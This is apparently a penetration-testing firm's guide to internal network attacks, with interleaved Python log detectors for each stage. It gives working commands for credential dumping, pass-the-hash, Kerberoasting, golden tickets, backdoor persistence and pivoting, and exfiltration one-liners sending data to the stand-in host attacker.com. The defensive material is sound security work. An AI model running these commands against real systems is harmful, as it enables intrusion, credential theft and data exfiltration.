Internal Network Penetration

[Figure: attack path from a compromised initial-access host through a workstation, file server, domain controller and database to the target.]

Internal network penetration involves exploiting vulnerabilities and misconfigurations within an organization's private network after gaining initial access. This guide covers advanced techniques for navigating, escalating privileges, and maintaining persistence in internal environments.


Understanding Internal Network Attacks

Once attackers breach the perimeter, internal networks often provide rich targets with weaker security controls. Understanding internal penetration techniques is crucial for both offensive and defensive security operations.

Initial Enumeration

Network Enumeration

Network Discovery

# Discover live hosts
nmap -sn 192.168.1.0/24
arp-scan -l
netdiscover -r 192.168.1.0/24

# Windows enumeration
net view /all
net view /domain
net group "Domain Computers" /domain

# PowerShell network scan
1..254 | ForEach-Object {Test-Connection -ComputerName "192.168.1.$_" -Count 1 -Quiet}

# Linux network enumeration
for i in {1..254}; do ping -c 1 192.168.1.$i & done
ip neigh show

Service Enumeration

# Comprehensive port scan
nmap -p- -sV -sC -A 192.168.1.0/24 -oA internal_scan

# SMB enumeration
enum4linux -a 192.168.1.10
smbclient -L //192.168.1.10 -N
crackmapexec smb 192.168.1.0/24

# LDAP enumeration
ldapsearch -x -h 192.168.1.10 -s base namingcontexts

# SNMP enumeration
snmpwalk -v2c -c public 192.168.1.10
onesixtyone -c community.txt 192.168.1.0/24
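The sweeps and port scans above are noisy by nature, and that noise is what a defender looks for. The following detector is an added example (not code from this page or from any tool it names): it reads connection records (timestamp, source, destination, port) and flags a source that touches many hosts, or many ports on one host, inside a short window. The records and thresholds are constructed assumptions; real input would come from firewall, NetFlow or Zeek conn logs.

```python
"""Flag host sweeps and port scans in connection records.

Added defensive example; records and thresholds below are constructed
assumptions, not data or settings from any real environment.
"""
from collections import defaultdict, deque

SWEEP_HOSTS = 20    # distinct destinations from one source inside WINDOW
SCAN_PORTS = 15     # distinct ports on one destination from one source
WINDOW = 60.0       # seconds


def detect_scans(records, sweep_hosts=SWEEP_HOSTS, scan_ports=SCAN_PORTS,
                 window=WINDOW):
    """records: iterable of (ts, src, dst, dport) tuples sorted by ts.

    Returns {("sweep", src, "*"): max_hosts, ("portscan", src, dst): max_ports}
    for every source that crossed a threshold.
    """
    recent = defaultdict(deque)   # src -> deque of (ts, dst, dport) in WINDOW
    alerts = {}
    for ts, src, dst, dport in records:
        q = recent[src]
        q.append((ts, dst, dport))
        while ts - q[0][0] > window:        # drop records older than WINDOW
            q.popleft()
        hosts = {d for _, d, _ in q}
        if len(hosts) >= sweep_hosts:
            key = ("sweep", src, "*")
            alerts[key] = max(alerts.get(key, 0), len(hosts))
        ports = {p for _, d, p in q if d == dst}
        if len(ports) >= scan_ports:
            key = ("portscan", src, dst)
            alerts[key] = max(alerts.get(key, 0), len(ports))
    return alerts


def sample_records():
    """Constructed connection log: one sweep, one port scan, benign traffic."""
    rows = []
    for i in range(1, 31):                      # 30 hosts on tcp/445 in 30 s
        rows.append((float(i), "192.168.1.50", f"192.168.1.{i}", 445))
    for p in range(1, 21):                      # 20 ports on one host in 20 s
        rows.append((100.0 + p, "192.168.1.77", "192.168.1.10", p))
    rows += [                                   # a workstation using 3 servers
        (200.0, "192.168.1.20", "192.168.1.10", 445),
        (201.0, "192.168.1.20", "192.168.1.11", 389),
        (202.0, "192.168.1.20", "192.168.1.12", 3389),
    ]
    return sorted(rows, key=lambda r: r[0])


if __name__ == "__main__":
    for (kind, src, dst), n in sorted(detect_scans(sample_records()).items()):
        print(f"{kind:8} {src} -> {dst}: {n}")
```

The sliding window is per source, so a slow scan spread over hours stays below the thresholds; lowering them raises false positives from monitoring systems and vulnerability scanners, which are better handled by an explicit allowlist of known scanner addresses.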

Credential Access

Credential Dumping

# Mimikatz - Windows credential dumping
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::secrets

# Linux credential harvesting
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > hashes.txt
john hashes.txt

# Browser credential extraction
# Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
# Firefox: %APPDATA%\Mozilla\Firefox\Profiles\
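Tools that read LSASS memory, as in the Mimikatz commands above, must first open a handle to lsass.exe with read access, and Sysmon records every such handle open as Event ID 10. The detector below is an added example, not code from this page or from Sysmon: it flags handle opens on LSASS that request memory-read or thread-creation rights from a binary outside a path allowlist, and raises the severity when the call stack contains unbacked (UNKNOWN) frames. The JSON events and the allowlist are constructed assumptions.

```python
"""Flag suspicious handle opens on lsass.exe in Sysmon Event ID 10 records.

Added defensive example for the credential-dumping section. The JSON lines
below are constructed, and the allowlist is an assumption to tune per host.
"""
import json

LSASS_SUFFIX = "\\lsass.exe"
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_CREATE_THREAD = 0x0002
PROCESS_DUP_HANDLE = 0x0040
SENSITIVE = (PROCESS_VM_READ | PROCESS_VM_WRITE
             | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE)

# Full paths (lower-case) of binaries allowed to read LSASS memory. Matching on
# the full path, not the file name, means a copy of "svchost.exe" dropped in a
# user directory is still reported.
ALLOWLIST = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\services.exe",
    "c:\\windows\\system32\\svchost.exe",
}


def classify(event):
    """Return an alert dict for a suspicious LSASS access, else None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith(LSASS_SUFFIX):
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if not granted & SENSITIVE:             # query-only handles are routine
        return None
    source = event.get("SourceImage", "")
    if source.lower() in ALLOWLIST:
        return None
    # Unbacked code in the call stack (reflective loaders, injected shellcode)
    # shows up as UNKNOWN frames in Sysmon's CallTrace.
    severity = "high" if "UNKNOWN" in event.get("CallTrace", "") else "medium"
    return {"severity": severity, "source": source,
            "granted": hex(granted), "pid": event.get("SourceProcessId")}


def scan_events(json_lines):
    """Parse newline-delimited JSON events and return the alerts in order."""
    alerts = []
    for line in json_lines.splitlines():
        if line.strip():
            alert = classify(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed Sysmon EID 10 events, flattened to one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c0d4", "SourceProcessId": 612}
{"EventID": 10, "SourceImage": "C:\\Users\\bob\\Downloads\\m.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c0d4|UNKNOWN(00000000C0C02B6A)", "SourceProcessId": 4412}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c0d4", "SourceProcessId": 5120}
{"EventID": 10, "SourceImage": "C:\\Users\\Public\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c0d4|C:\\Windows\\System32\\KERNELBASE.dll+2c0ea", "SourceProcessId": 7008}
"""

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(a)
```

Endpoint security products read LSASS legitimately, so the allowlist needs the real install path of whatever EDR or antivirus is deployed; the complementary preventive controls are Credential Guard and RunAsPPL, which stop the handle from being useful in the first place.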

Pass-the-Hash Attack

# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Using Impacket
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 [email protected]

# Using Metasploit
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

Lateral Movement

Remote Execution Techniques

# PsExec
PsExec.exe \\192.168.1.10 -u admin -p password cmd.exe

# WMI (Windows Management Instrumentation)
wmic /node:192.168.1.10 /user:admin /password:pass process call create "cmd.exe"

# PowerShell Remoting
Enter-PSSession -ComputerName 192.168.1.10 -Credential (Get-Credential)
Invoke-Command -ComputerName 192.168.1.10 -ScriptBlock {whoami}

# SSH (Linux)
ssh [email protected]
ssh -i private_key [email protected]

# RDP
rdesktop 192.168.1.10
xfreerdp /v:192.168.1.10 /u:admin /p:password
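Whether the remote execution above arrives over SMB (PsExec), WMI or WinRM, and whether the credential is a password or a hash, the target host records a Security event 4624 with logon type 3. One account reaching an unusual number of hosts in a few minutes is therefore the common signal for both the pass-the-hash and the remote-execution sections. The code below is an added example, not code from this page or from Windows: it groups 4624 events by source address and account and flags fan-out past a threshold, annotating NTLM logons with a zero session-key length, which is typical of hash-based tooling but is only a weak indicator on its own. The events and thresholds are constructed assumptions.

```python
"""Flag one account authenticating to many hosts over the network in a short
window, from Windows Security 4624 (logon success) records.

Added defensive example for the pass-the-hash and remote-execution sections.
Events and thresholds are constructed assumptions.
"""
from collections import defaultdict, deque

FANOUT_HOSTS = 4      # distinct target computers from one (source IP, account)
WINDOW = 300.0        # seconds
NETWORK_LOGON = "3"   # 4624 LogonType 3 covers SMB/PsExec, WMI and WinRM


def find_fanout(events, threshold=FANOUT_HOSTS, window=WINDOW):
    """events: dicts with ts, Computer, TargetUserName, IpAddress, LogonType,
    AuthenticationPackageName, KeyLength (strings as exported from the log).

    Returns {(ip, user): {"hosts": [...], "ntlm_without_session_key": bool}}.
    """
    recent = defaultdict(deque)        # (ip, user) -> deque of (ts, host, flag)
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev.get("EventID") != 4624 or ev.get("LogonType") != NETWORK_LOGON:
            continue
        user = ev["TargetUserName"]
        if user.endswith("$"):          # machine accounts talk to many hosts
            continue
        key = (ev["IpAddress"], user)
        # NTLM network logons with KeyLength 0 are typical of tools that
        # authenticate with a hash rather than a password-derived session.
        ntlm_nokey = (ev.get("AuthenticationPackageName") == "NTLM"
                      and ev.get("KeyLength") == "0")
        q = recent[key]
        q.append((ev["ts"], ev["Computer"], ntlm_nokey))
        while ev["ts"] - q[0][0] > window:
            q.popleft()
        hosts = {h for _, h, _ in q}
        if len(hosts) >= threshold:
            a = alerts.setdefault(key, {"hosts": set(),
                                        "ntlm_without_session_key": False})
            a["hosts"] |= hosts
            a["ntlm_without_session_key"] |= any(f for _, _, f in q)
    return {k: {"hosts": sorted(v["hosts"]),
                "ntlm_without_session_key": v["ntlm_without_session_key"]}
            for k, v in alerts.items()}


def sample_events():
    """Constructed 4624 events: one lateral-movement burst plus normal use."""
    def logon(ts, host, user, ip, ltype="3", pkg="Kerberos", keylen="128"):
        return {"EventID": 4624, "ts": ts, "Computer": host,
                "TargetUserName": user, "IpAddress": ip, "LogonType": ltype,
                "AuthenticationPackageName": pkg, "KeyLength": keylen}
    burst = [logon(10.0 * i, h, "svc_backup", "192.168.1.50", pkg="NTLM", keylen="0")
             for i, h in enumerate(["WS01", "WS02", "WS03", "WS04", "FS01"])]
    normal = [logon(500.0, "FS01", "alice", "192.168.1.20"),
              logon(520.0, "DC01", "alice", "192.168.1.20"),
              logon(530.0, "WS01", "alice", "192.168.1.20", ltype="2"),
              logon(540.0, "WS02", "WS01$", "192.168.1.21", pkg="NTLM", keylen="0")]
    return burst + normal


if __name__ == "__main__":
    for (ip, user), info in find_fanout(sample_events()).items():
        print(ip, user, info)
```

This only works when 4624 events from every workstation and server are forwarded centrally; the threshold should be set per account class, since backup and monitoring accounts legitimately reach many hosts and belong on an allowlist with a tighter expected host set.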

Token Impersonation

# Meterpreter token manipulation
use incognito
list_tokens -u
impersonate_token DOMAIN\\Administrator

# PowerShell token stealing
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "DOMAIN\admin"

Domain Compromise

Active Directory Attacks

# Bloodhound - AD visualization
bloodhound-python -d domain.local -u user -p password -ns 192.168.1.10 -c all

# Kerberoasting
GetUserSPNs.py -request -dc-ip 192.168.1.10 domain.local/user:password
Invoke-Kerberoast -OutputFormat Hashcat

# AS-REP Roasting
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt

# DCSync attack
mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:domain.local"
secretsdump.py domain.local/[email protected] -just-dc
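Kerberoasting and AS-REP roasting both leave a record on the domain controller: a TGS request (event 4769) per service ticket, and a TGT request (event 4768) whose pre-authentication type is 0 for accounts that do not require pre-authentication. The detector below is an added example, not code from this page or from any of the tools it lists: it flags an account that requests RC4-encrypted service tickets for several distinct service accounts in a short window, and any TGT issued without pre-authentication. Events and thresholds are constructed assumptions.

```python
"""Flag Kerberoasting and AS-REP roasting patterns in Security log records.

Added defensive example for the Active Directory attacks section; the events
and thresholds are constructed assumptions.
  4769 (TGS request): many RC4 (0x17) service tickets for distinct service
        accounts from one user in a short window.
  4768 (TGT request): Pre-Authentication Type 0, i.e. the account has
        "Do not require Kerberos preauthentication" set.
"""
from collections import defaultdict, deque

ROAST_SERVICES = 5     # distinct RC4 service tickets per account in WINDOW
WINDOW = 120.0         # seconds
RC4_HMAC = "0x17"      # TicketEncryptionType value for RC4; AES is 0x11/0x12


def roasting_alerts(events, threshold=ROAST_SERVICES, window=WINDOW):
    """Return a list of (kind, account, detail) tuples, one per finding."""
    alerts = {}
    recent = defaultdict(deque)     # account -> deque of (ts, service account)
    for ev in sorted(events, key=lambda e: e["ts"]):
        eid = ev.get("EventID")
        account = ev.get("TargetUserName", "").split("@")[0].lower()
        if eid == 4768 and ev.get("PreAuthType") == "0":
            alerts[("asrep_roastable", account)] = "TGT issued without pre-authentication"
        elif eid == 4769:
            service = ev.get("ServiceName", "")
            # Computer accounts and krbtgt are not Kerberoasting targets
            if service.endswith("$") or service.lower() == "krbtgt":
                continue
            if ev.get("TicketEncryptionType") != RC4_HMAC or ev.get("Status") != "0x0":
                continue
            q = recent[account]
            q.append((ev["ts"], service))
            while ev["ts"] - q[0][0] > window:
                q.popleft()
            services = {s for _, s in q}
            if len(services) >= threshold:
                alerts[("kerberoast", account)] = (
                    f"{len(services)} RC4 service tickets from {ev.get('IpAddress')}")
    return [(kind, acct, detail) for (kind, acct), detail in alerts.items()]


def sample_events():
    """Constructed 4768/4769 events: one roasting burst, one account without
    pre-authentication, and ordinary AES service-ticket traffic."""
    service_accounts = ["svc_sql01", "svc_web", "svc_sql02",
                        "svc_fs", "svc_ldap", "svc_app"]
    burst = [{"EventID": 4769, "ts": float(i), "TargetUserName": "alice@DOMAIN.LOCAL",
              "ServiceName": s, "TicketEncryptionType": "0x17", "Status": "0x0",
              "IpAddress": "::ffff:192.168.1.50"} for i, s in enumerate(service_accounts)]
    burst.append({"EventID": 4769, "ts": 6.0, "TargetUserName": "alice@DOMAIN.LOCAL",
                  "ServiceName": "WS01$", "TicketEncryptionType": "0x17",
                  "Status": "0x0", "IpAddress": "::ffff:192.168.1.50"})
    normal = [{"EventID": 4769, "ts": 300.0, "TargetUserName": "bob@DOMAIN.LOCAL",
               "ServiceName": "svc_fs", "TicketEncryptionType": "0x12",
               "Status": "0x0", "IpAddress": "::ffff:192.168.1.20"},
              {"EventID": 4768, "ts": 301.0, "TargetUserName": "bob",
               "PreAuthType": "2", "Status": "0x0"},
              {"EventID": 4768, "ts": 302.0, "TargetUserName": "svc_legacy",
               "PreAuthType": "0", "Status": "0x0"}]
    return burst + normal


if __name__ == "__main__":
    for kind, acct, detail in roasting_alerts(sample_events()):
        print(f"{kind:16} {acct:12} {detail}")
```

The RC4 filter is what keeps the false-positive rate low: once service accounts are configured for AES-only tickets and given long random passwords (or moved to group managed service accounts), any remaining 0x17 request is itself worth a look.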

Golden Ticket Attack

# Create golden ticket with Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /id:500

# Inject and use the ticket
kerberos::ptt ticket.kirbi

# Verify access
dir \\dc01\c$

Persistence Mechanisms

Windows Persistence

# Registry Run Keys
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

# Scheduled Tasks
schtasks /create /tn "WindowsUpdate" /tr "C:\backdoor.exe" /sc onlogon /ru System

# WMI Event Subscription
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name="BadFilter";EventNamespace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent"}

# Service Installation
sc create BackdoorService binPath= "C:\backdoor.exe" start= auto
net start BackdoorService
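Each of the four Windows persistence mechanisms above produces an event with the command it will run: 7045 for a service install, 4698 for a scheduled task (with the task XML in the event), and Sysmon event 13 for a value written under a Run key; a WMI subscription surfaces in the WMI-Activity operational log and Sysmon events 19 to 21 in the same way. The code below is an added example, not code from this page or from Windows: it pulls the executable out of each of the first three event types and reports it when the path lies outside the trusted install roots. Events and the trusted-root list are constructed assumptions.

```python
"""Flag persistence artefacts pointing at untrusted paths in Windows event
records: 7045 (service installed), 4698 (scheduled task created) and Sysmon
13 (registry value set under a Run key).

Added defensive example for the Windows persistence section; events are
constructed and the trusted-root list is an assumption.
"""
import re

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")


def executable_path(command):
    """First token of a command line, with quotes and any arguments removed."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)].lower()
    return command.split(" ")[0].lower()


def untrusted(command):
    """True when the executable lives outside the trusted roots (which covers
    the drive root, user profiles, ProgramData and temp directories)."""
    path = executable_path(command)
    return bool(path) and not path.startswith(TRUSTED_ROOTS)


def task_command(task_xml):
    """Pull <Command> from the 4698 TaskContent XML; empty if absent."""
    m = re.search(r"<Command>(.*?)</Command>", task_xml, re.S)
    return m.group(1).strip() if m else ""


def persistence_alerts(events):
    """Return (EventID, name, command) for each event pointing at an untrusted path."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 7045:
            name, cmd = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        elif eid == 4698:
            name, cmd = ev.get("TaskName", ""), task_command(ev.get("TaskContent", ""))
        elif eid == 13 and any(k in ev.get("TargetObject", "").lower() for k in RUN_KEYS):
            name, cmd = ev.get("TargetObject", ""), ev.get("Details", "")
        else:
            continue
        if untrusted(cmd):
            alerts.append((eid, name, cmd))
    return alerts


# Constructed events; only the fields the detector reads are included.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "BackdoorService", "ImagePath": r"C:\backdoor.exe"},
    {"EventID": 7045, "ServiceName": "wuauserv",
     "ImagePath": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
    {"EventID": 4698, "TaskName": r"\WindowsUpdate",
     "TaskContent": r"<Task><Actions><Exec><Command>C:\backdoor.exe</Command></Exec></Actions></Task>"},
    {"EventID": 4698, "TaskName": r"\Vendor\Updater",
     "TaskContent": r'<Task><Actions><Exec><Command>"C:\Program Files\Vendor\updater.exe"</Command><Arguments>/silent</Arguments></Exec></Actions></Task>'},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor",
     "Details": r"C:\backdoor.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for eid, name, cmd in persistence_alerts(SAMPLE_EVENTS):
        print(eid, name, "->", cmd)
```

A path check is a coarse first filter; a task named after a Windows component but created by an interactive user, or a service whose binary is not signed by the vendor whose name it carries, deserves the same attention even when it sits under Program Files.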

Linux Persistence

# Cron jobs
(crontab -l; echo "@reboot /tmp/backdoor.sh") | crontab -
echo "* * * * * /tmp/backdoor.sh" >> /etc/crontab

# SSH keys
mkdir -p ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/tmp/backdoor.sh
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
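The three Linux persistence points above are all plain text, which makes them easy to audit: crontab entries, unit files and authorized_keys can be read on a schedule and compared with a baseline. The script below is an added example, not code from this page or from any distribution: it flags cron and systemd commands that run from world-writable or home directories, and reports SSH keys that were not in the baseline, comparing key material so that a line whose options or comment changed is not reported as new. The inputs are constructed; on a live host the text would come from crontab -l, /etc/crontab and /etc/cron.d/*, the unit files under /etc/systemd/system, and each user's ~/.ssh/authorized_keys.

```python
"""Audit Linux persistence points from their text form: crontab entries,
systemd unit files and authorized_keys.

Added defensive example for the Linux persistence section; all inputs below
are constructed.
"""
import re

# Directories from which scheduled or boot-time code should not normally run
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def _untrusted(cmd):
    path = cmd.strip().split()[0] if cmd.strip() else ""
    return path.startswith(WRITABLE_PREFIXES)


def audit_crontab(text, system_format=False):
    """Return flagged crontab lines. System crontabs (/etc/crontab, cron.d)
    carry a user field between the schedule and the command."""
    flagged = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2 if system_format else 1)   # @reboot [user] cmd
        else:
            parts = line.split(None, 6 if system_format else 5)   # m h dom mon dow [user] cmd
        if _untrusted(parts[-1]):
            flagged.append(line)
    return flagged


def audit_unit(text):
    """Return ExecStart* commands of a systemd unit that run from writable dirs."""
    flagged = []
    for line in text.splitlines():
        m = re.match(r"\s*Exec(?:Start|StartPre|StartPost)\s*=\s*-?(.*)", line)
        if m and _untrusted(m.group(1)):
            flagged.append(m.group(1).strip())
    return flagged


def key_blob(line):
    """Extract 'type base64' from an authorized_keys line, skipping options."""
    m = re.search(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+(\S+)", line)
    return f"{m.group(1)} {m.group(2)}" if m else None


def new_keys(current, baseline):
    """Keys present now that were not in the baseline, compared by key material."""
    known = {key_blob(l) for l in baseline.splitlines()} - {None}
    return [l.strip() for l in current.splitlines()
            if key_blob(l) and key_blob(l) not in known]


# Constructed inputs
USER_CRONTAB = """# m h dom mon dow command
0 2 * * * /usr/bin/backup.sh
@reboot /tmp/backdoor.sh
"""
ETC_CRONTAB = """SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /tmp/backdoor.sh
"""
UNIT_FILE = """[Unit]
Description=Backdoor Service
[Service]
ExecStart=/tmp/backdoor.sh
[Install]
WantedBy=multi-user.target
"""
BASELINE_KEYS = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedBaselineKey admin@laptop\n"
CURRENT_KEYS = (
    'no-pty,command="/bin/true" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedBaselineKey admin@laptop\n'
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDConstructedInjectedKey injected\n"
)

if __name__ == "__main__":
    print("user crontab:", audit_crontab(USER_CRONTAB))
    print("/etc/crontab:", audit_crontab(ETC_CRONTAB, system_format=True))
    print("unit file:   ", audit_unit(UNIT_FILE))
    print("new keys:    ", new_keys(CURRENT_KEYS, BASELINE_KEYS))
```

Path-based checks catch the common case shown on this page but not a script copied into /usr/local/bin; pairing this audit with file-integrity monitoring of the same directories (auditd watch rules or AIDE) closes that gap.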

Pivoting and Tunneling

Network Pivoting

# SSH Dynamic Port Forwarding (SOCKS)
ssh -D 9050 user@compromised-host
proxychains nmap -sT 10.10.10.0/24

# SSH Local Port Forwarding
ssh -L 8080:internal-server:80 user@compromised-host

# SSH Remote Port Forwarding
ssh -R 8080:localhost:80 user@attacker-server

# Metasploit autoroute
run autoroute -s 10.10.10.0/24
use auxiliary/server/socks_proxy
set SRVPORT 1080
run

Data Exfiltration

# Find sensitive files
# Windows
dir /s /b C:\ | findstr /i "password credential secret"

# Linux
find / -name "*password*" -o -name "*credential*" 2>/dev/null

# Exfiltration via HTTP
curl -F "[email protected]" http://attacker.com/upload

# Exfiltration via DNS
# Split file and send via DNS queries
for chunk in $(split -b 63 data.txt); do nslookup $chunk.attacker.com; done

# Compressed exfiltration
tar czf - /path/to/data | base64 | curl -d @- http://attacker.com/receive
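The DNS exfiltration loop above turns every 63-byte chunk of a file into a unique subdomain, so the resolver log for that client shows a burst of long, random-looking names under one parent domain. The detector below is an added example, not code from this page: it groups queries by client and parent domain and flags the pair when the number of unique subdomains, their mean length and their mean Shannon entropy cross thresholds. Log lines and thresholds are constructed; the parent-domain split on the last two labels is a simplification that a production detector would replace with a public-suffix list.

```python
"""Flag DNS tunnelling / exfiltration patterns in query logs: many unique,
long, high-entropy subdomains under one parent domain from one client.

Added defensive example for the data-exfiltration section; the log lines
and thresholds are constructed assumptions.
"""
import hashlib
import math
from collections import defaultdict

MIN_UNIQUE = 20      # unique subdomains per (client, parent domain)
MIN_MEAN_LEN = 30    # mean length of the subdomain part, in characters
MIN_ENTROPY = 3.5    # mean Shannon entropy (bits/char) of the subdomain part


def shannon_entropy(s):
    """Bits per character; hex data is close to 4, English words nearer 3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_domain(qname):
    """('sub.labels', 'parent.tld'); simplified to the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def dns_exfil_alerts(lines, min_unique=MIN_UNIQUE, min_mean_len=MIN_MEAN_LEN,
                     min_entropy=MIN_ENTROPY):
    """lines: 'timestamp client qname' per line. Returns {(client, parent): stats}."""
    seen = defaultdict(set)
    for line in lines.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _, client, qname = parts
        sub, parent = split_domain(qname)
        if sub:
            seen[(client, parent)].add(sub)
    alerts = {}
    for key, subs in seen.items():
        mean_len = sum(len(s) for s in subs) / len(subs)
        mean_ent = sum(shannon_entropy(s) for s in subs) / len(subs)
        if len(subs) >= min_unique and (mean_len >= min_mean_len or mean_ent >= min_entropy):
            alerts[key] = {"unique": len(subs), "mean_len": round(mean_len, 1),
                           "mean_entropy": round(mean_ent, 2)}
    return alerts


def sample_log():
    """Constructed query log: one client tunnelling data out, plus normal lookups."""
    rows = []
    for i in range(25):   # 60-hex-char chunk labels standing in for file data
        label = hashlib.sha256(str(i).encode()).hexdigest()[:60]
        rows.append(f"1700000{i:03d} 192.168.1.50 {label}.exfil.example.net")
    rows += ["1700001000 192.168.1.20 www.example.com",
             "1700001001 192.168.1.20 mail.example.com",
             "1700001002 192.168.1.20 www.example.com",
             "1700001003 192.168.1.50 fs01.domain.local"]
    return "\n".join(rows)


if __name__ == "__main__":
    for (client, parent), stats in dns_exfil_alerts(sample_log()).items():
        print(client, parent, stats)
```

Content-delivery and anti-spam services also generate long machine-made subdomains, so the parent-domain allowlist matters as much as the thresholds; the stronger control is to permit only the internal resolver to leave the network, which turns every direct external DNS query into its own alert.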

Legal and Ethical Notice

Internal network penetration testing must only be performed with explicit written authorization. Unauthorized access to networks and systems is illegal and unethical.

HackHub Professional Services


Expert Internal Network Penetration Testing

The HackHub team specializes in comprehensive internal network security assessments with over 10 years of experience. We simulate real-world attack scenarios to identify and remediate vulnerabilities in your internal infrastructure, Active Directory environments, and critical systems.

Our Services Include:

  • Internal Network Penetration Testing
  • Active Directory Security Assessment
  • Red Team Operations
  • Assumed Breach Scenarios

Contact [email protected] for professional security services.

Defense Recommendations

  • Network Segmentation: Implement proper VLANs and access controls
  • Least Privilege: Limit user and service account permissions
  • MFA: Implement multi-factor authentication for all accounts
  • Monitoring: Deploy EDR/XDR solutions and SIEM
  • Patch Management: Keep systems and software up to date
  • Credential Hygiene: Implement strong password policies and credential rotation

Conclusion

Internal network penetration testing is a critical component of comprehensive security assessments. Understanding these techniques helps both offensive security professionals conduct thorough testing and defensive teams implement effective controls. Regular testing and continuous monitoring are essential for maintaining security in modern enterprise environments.